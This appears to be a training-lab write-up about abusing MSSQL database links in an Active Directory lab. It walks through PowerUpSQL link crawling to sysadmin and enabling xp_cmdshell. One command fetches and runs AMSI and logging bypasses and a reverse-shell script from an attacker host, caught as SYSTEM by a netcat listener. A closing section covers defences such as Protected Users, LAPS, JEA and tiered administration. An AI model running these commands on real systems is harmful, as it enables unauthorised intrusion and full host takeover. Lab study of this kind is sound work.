VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1880
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student163
IsSysadmin : No
ActiveSessions : 1

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1880
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student163
IsSysadmin : No
ActiveSessions : 1

Abusing MSSQL Servers Database Links

A database link allows a SQL Server to access external data sources like other SQL Servers and OLE DB data
sources. In case of database links between SQL servers, that is, linked SQL servers it is possible to execute
stored procedures. Database links work even across forest trusts.

Enumeration
PS C:\Windows\system32> Get-SQLServerLink -Instance dcorp-mssql.dollarcorp.moneycorp.local

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DatabaseLinkId : 0
DatabaseLinkName : DCORP-MSSQL
DatabaseLinkLocation : Local
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : True
is_data_access_enabled : False
modify_date : 11/14/2022 4:46:10 AM

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DatabaseLinkId : 1
DatabaseLinkName : DCORP-SQL1
DatabaseLinkLocation : Remote
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 12/4/2022 5:16:19 AM

From the output it can be confirmed that there is a database link between dccorp-mssql and dcorp-sql.
The data access is also enabled.

select * from master..sysservers - This SQL query can also be used to query the database links.
From the output of the query, there’s a database link between dccorp-mssql and dcorp-sql1.

If Data access is enabled, we can use openquery() functions to run queries on a linked database.

select * from openquery("DCORP-SQL1",'select * from master..sysservers')

From the output of the query, there’s a database link between dccorp-sql1 and dcorp-mgmt.

dcorp-mgmt might have links to another database as well.

Instead of finding the database links manually, we can use the PowerUPSQL function Get-
SQLServerLinkCrawl whch will enumerate all the links.
PS C:\Windows\system32> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -
Verbose
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL
VERBOSE: - Link Login: dcorp\student163
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE: - Link Login: dblinkuser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE: - Link Login: sqluser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: EU-SQL10.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: EU-SQL10
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-
SQL10.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:

Version : SQL Server 2019

Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student163
Links : {DCORP-SQL1}

Version : SQL Server 2019

Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019

Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL10.EU.EUROCORP.LOCAL}

Version : SQL Server 2019

Instance : EU-SQL10
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL10.EU.EUROCORP.LOCAL}
User : sa
Links :

From the output, we can observe the links to the databases and from the final link to the database EU-
SQL10.EU.EUROCORP.LOCAL we have the sysadmin access (sa). Sine we have sysadmin admin, we can
enable xp_cmdshell on it.
PS C:\Windows\system32> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -
Query "exec master..xp_cmdshell 'cmd /c set username'"

Version : SQL Server 2019

Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student163
Links : {DCORP-SQL1}

Version : SQL Server 2019

Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019

Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL10.EU.EUROCORP.LOCAL}

Version : SQL Server 2019

Instance : EU-SQL10
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL10.EU.EUROCORP.LOCAL}
User : sa
Links :
The xp_cmdshell is enabled on the database instance EU-SQL10.EU.EUROCORP.LOCAL.

If it is not enabled, we can use these commands to enable it.

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query
'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "EU-SQL10.EU.EUROCORP.LOCAL"'

Getting a reverse shell

Creating a listener
C:\Windows\system32>"C:\AD\Tools\netcat-win32-1.12\nc.exe" -nvlp 443
listening on [any] 443 ...

We make the different tools available on the Web Server.

PS C:\Windows\system32> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec

master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing
http://172.16.100.163/sbloggingbypass.txt);iex (iwr -UseBasicParsing
http://172.16.100.163/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.163/Invoke-
PowerShellTcp_modified.ps1)"''' -QueryTarget eu-sql10

Version : SQL Server 2019

Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student163
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019

Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL10.EU.EUROCORP.LOCAL}

Version : SQL Server 2019

Instance : EU-SQL10
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL10.EU.EUROCORP.LOCAL}
User : sa
Links :

We received a reverse shell.

connect to [172.16.100.163] from (UNKNOWN) [172.16.15.17] 55263
Windows PowerShell running as user SYSTEM on EU-SQL10
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>set username
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql10
PS C:\Windows\system32>
Detection and Defense
Protect and Limit Domain Admins
• Reduce the number of Domain Administrators in your environment

• Do not allow or Limit the Domain Administrators to to any other machines other than the domain
controllers. If logins to some servers are necessary, do not allow other administrators to login to
those machines.

• Never run a service account with the Domain Administrator privileges. - credentials for service
accounts are stored in the local registry, as what's called "LSA Secrets" in the registry key
HKEY_LOCAL_MACHINE/Security/Policy/Secrets. Anyone with administrative privileges can
extract those passwords in clear text. The EDR or the credential guard would not even bat an eye.

• Set "Account is sensitive and cannot be Delegated" to Domain Administrators

Protected Users Group

Protected Users is a global security group for Active Directory (AD) designed to protect against credential
theft attacks. The group triggers non-configurable protection on devices and host computers to prevent
credentials from being cached when group members sign-in.

Prerequisites
Your system must meet the following prerequisites before you can deploy a Protected Users group:

• Hosts must be running one of the following operating systems:

o Windows 8.1 or later

o Windows Server 2012 R2 or later with the most recent security updates installed

• The domain functional level must be Windows Server 2012 R2 or later.

Protections applied by Active Directory

Becoming a member of the Protected Users group means AD automatically applies certain pre-configured
controls that the users won't be able to change unless they stop being group members.

Device protections for signed in Protected Users

When the signed in user is a member of the Protected Users group, the group provides the following
protections:

• Credential delegation (CredSSP) doesn't cache the user's plain text credentials even when the user
enables the Allow delegating default credentials Group Policy setting.

• For Windows 8.1 and later and Windows Server 2012 R2 and later, Windows Digest doesn't cache
the user's plaintext credentials even when they've enabled Windows Digest.

• NTLM stops caching the user's plaintext credentials or NT one-way function (NTOWF).
 • Kerberos stops creating Data Encryption Standard (DES) or RC4 keys. Kerberos also doesn't cache
the user's plaintext credentials or long-term keys after acquiring the initial Ticket Granting Ticket
(TGT).

• The system doesn't create a cached verifier at user sign-in or unlock, so member systems no
longer support offline sign-in.

After you add a new user account to the Protected Users group, these protections will activate when the
new Protected User signs in to their device.

Domain controller protections for Protected Users

Protected User accounts that authenticate to a domain running Windows Server 2012 R2 or later are
unable to do the following:

• Authenticate with NTLM authentication.

• Use DES or RC4 encryption types in Kerberos pre-authentication.

• Delegate with unconstrained or constrained delegation.

• Renew Kerberos TGTs beyond their initial four-hour lifetime.

Isolate Administrative workstations

Privileged Administrative workstations
• A hardened workstation for performing sensitive tasks like administration of domain controllers,
cloud infrastructure, sensitive business functions etc.

• Can provide protection from phishing attacks, OS vulnerabilities, credential replay attacks

• Admin Jump servers to be accessed only from a PAW, multiple strategies

o Separate privilege and hardware for administrative and normal tasks

o Having a VM on a PAW for user tasks

Secure Local Administrators

Use LAPS

• Centralized storage of passwords in AD with periodic randomizing where read permissions are
access controlled

• Computer Objects have two new attributes - ms-mcsAdmPwd attribute - stores the clear text
password and ms-mcs-AdmPwdExpirationTime - Controls the password change

• Storage in Clear text, transmission is encrypted

Time Bound Administration
Just in Time (JIT) administration
Just in Time (JIT) administration provides the ability to grant time bund administrative access on per-
request bases.

Just Enough Administration (JEA)

• Provides role based access control for PowerShell based remote delegated administration

• With JEA non-admin users can connect remotely to machines for doing specific administrative
tasks.

• For example, we can control the command a user runs and even restrict parameters which can be
used.

• JEA endpoints have PowerShell transactional and logging enabled

Tier Model
• Composed of three levels only for administrative accounts:

o Tier 0 - Accounts, Groups and Computers which have privileges across the enterprise like
domain controllers, domain admins, enterprise admins..

o Tier 1 - Accounts, Groups and Computers which have access to resources having
significant amount of business value. A common example role is server administrators
who maintain these operating systems with the ability to impact all enterprise services.

o Tier 2 - Administrator accounts which have administrative control of a significant amount

of business value that is hosted on workstations and devices. Examples include Helo Desk
and computer support administrators because they can impact the integrity of almost any
user data.

• Control Restrictions - What Admins Control

• Logon Restrictions - Where admins can logon to